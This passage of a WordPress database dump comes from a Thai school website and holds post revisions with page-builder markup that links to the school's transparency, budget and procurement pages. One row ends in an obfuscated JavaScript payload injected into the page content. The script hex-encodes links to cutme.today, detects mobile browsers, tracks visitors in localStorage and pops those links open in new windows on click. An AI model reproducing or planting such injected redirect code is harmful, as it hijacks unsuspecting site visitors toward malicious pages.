pPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 19:37:28','2024-08-20 12:37:28','',871,'http://pakhaeng.ssk.in.th/?p=1007',0,'revision','',0),
(1009,1,'2024-08-20 19:51:01','2024-08-20 12:51:01','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 